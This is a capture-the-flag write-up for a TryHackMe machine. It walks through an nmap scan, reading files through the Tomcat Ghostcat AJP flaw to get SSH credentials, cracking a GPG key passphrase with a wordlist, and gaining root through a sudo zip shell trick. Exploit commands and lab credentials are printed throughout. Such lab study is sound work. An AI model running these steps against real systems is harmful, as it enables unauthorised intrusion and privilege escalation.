# Tasks
* user.txt
* root.txt

# NMAP SCAN
```nmap
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# NESSUS REPORT
[[tomghost_report.pdf]]

## Findings
* ajp13
* Tomcat 9.0.30

### AJP (Port 8009)

AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat.

#### Enumeration
`nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <IP>`

If the AJP port is exposed, Tomcat might be susceptible to the Ghostcat vulnerability. Here is an [exploit](https://www.exploit-db.com/exploits/48143) that works with this issue.

#### Searchsploit
```txt
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion                                                                                      | multiple/webapps/48143.py
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)                                                                        | multiple/webapps/49039.rb

```

* Ghostcat is a file read vulnerability
* We can read files using port 8009
```py
python2 ape.py -f WEB-INF/web.xml 10.10.138.89
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
```

Possible credentials 
`skyfuck:8730281lkjlkjdqlksalks`

# Foothold
* We can login using the credentials given using SSH
* Directory listing :
```bash
drwxr-xr-x 3 skyfuck skyfuck 4096 Aug 21 00:29 .
drwxr-xr-x 4 root    root    4096 Mar 10  2020 ..
-rw------- 1 skyfuck skyfuck  136 Mar 10  2020 .bash_history
-rw-r--r-- 1 skyfuck skyfuck  220 Mar 10  2020 .bash_logout
-rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10  2020 .bashrc
drwx------ 2 skyfuck skyfuck 4096 Aug 21 00:29 .cache
-rw-r--r-- 1 skyfuck skyfuck  655 Mar 10  2020 .profile
-rw-rw-r-- 1 skyfuck skyfuck  394 Mar 10  2020 credential.pgp
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10  2020 tryhackme.asc
```

* Decrypt PGP using this [article](https://superuser.com/questions/1196165/pgp-file-decryption-from-linux-cmd-line/1196184)
* secret-key requires a password, SSH credentials didn't work.
* Refer to this article for [GPG Cracking](https://blog.atucom.net/2015/08/cracking-gpg-key-passwords-using-john.html)
* Password successfully cracked using rockyou wordlist
`tryhackme:alexandru`
* GPG file contains credentials for another user.
`merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j`

# Privilege Escalation
* Able to escalate to user merlin
```bash
User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
```
* Entry from [GTFObins](https://gtfobins.github.io/gtfobins/zip/#sudo) :

If the binary is allowed to run as superuser by `sudo`, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
```bash
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
```

We are now root.
```
-T tests the integrity of the new zip file
-TT runs commands
```





